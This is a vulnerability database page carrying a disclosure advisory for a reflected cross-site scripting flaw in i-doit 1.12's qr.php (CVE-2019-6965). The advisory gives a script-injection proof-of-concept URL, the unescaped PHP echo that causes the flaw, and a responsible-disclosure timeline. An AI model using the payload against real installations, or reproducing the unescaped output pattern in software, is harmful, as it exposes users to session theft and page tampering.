Vulners
Lucene search
i-doit 1.12 - 'qr.php' Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | i-doit 1.12 - qr.php Cross-Site Scripting Vulnerability | 28 Mar 201900:00 | – | zdt |
 | CVE-2019-6965 | 28 Mar 201919:06 | – | circl |
 | CVE-2019-6965 | 18 Jun 201912:25 | – | cve |
 | CVE-2019-6965 | 18 Jun 201912:25 | – | cvelist |
 | EUVD-2019-16519 | 7 Oct 202500:30 | – | euvd |
 | i-doit 1.12 - qr.php Cross-Site Scripting | 28 Mar 201900:00 | – | exploitpack |
 | CVE-2019-6965 | 18 Jun 201913:15 | – | nvd |
 | i-doit 1.12 Cross Site Scripting | 28 Mar 201900:00 | – | packetstorm |
 | Cross site scripting | 18 Jun 201913:15 | – | prion |
 | CVE-2019-6965 | 22 May 202508:49 | – | redhatcve |
10
# Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file
# Date: 28-03-2019
# Software Link: https://www.i-doit.org/
# Version: 1.12
# Exploit Author: BlackFog Team
# Contact: [email protected]
# Website: https://securelayer7.net
# Category: webapps
# Tested on: Firefox in Kali Linux.
# CVE: CVE-2019-6965
Vendor Description
==================
i-doit offers you a professional IT-documentation solution based on ITIL
guidelines. You can document IT systems and their changes, define emergency
plans, display vital information and ensure a stable and efficient
operation of IT networks.
Attack Type
==================
Reflected Cross Site Scripting on qr.php file in URL perameter reported By
Touhid M.Shaikh(@touhidshaikh22).
Proof of Concept
==================
https://IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
Vulnerable Code.
==================
---------------------------------- qr.php Source Code
-----------------------------
..................................... SNIP
........................................
$l_url = @$_GET['url']; <--- Vulnerable
Perameter
..................................... SNIP
........................................
<img id="code" src="<?php echo $l_url; ?>images/ajax-loading.gif"
alt="Error loading the QR Code" /> <--- Display Here without any
validation.
------------------------------qr.php Source Code ends
---------------------------
Fixed
======
Update to latest
Timeline
========
10 Jan, 2018 === Update to Customer
11 Jan, 2018 === Got Mail to Trigger the issue and we are able to repoduce
the same.
15 Jan, 2018 === Provided Hotfix.
17 Jan, 2018 === Got Thanks for responsible disclosure and agree to publish
on public.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2019 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.00779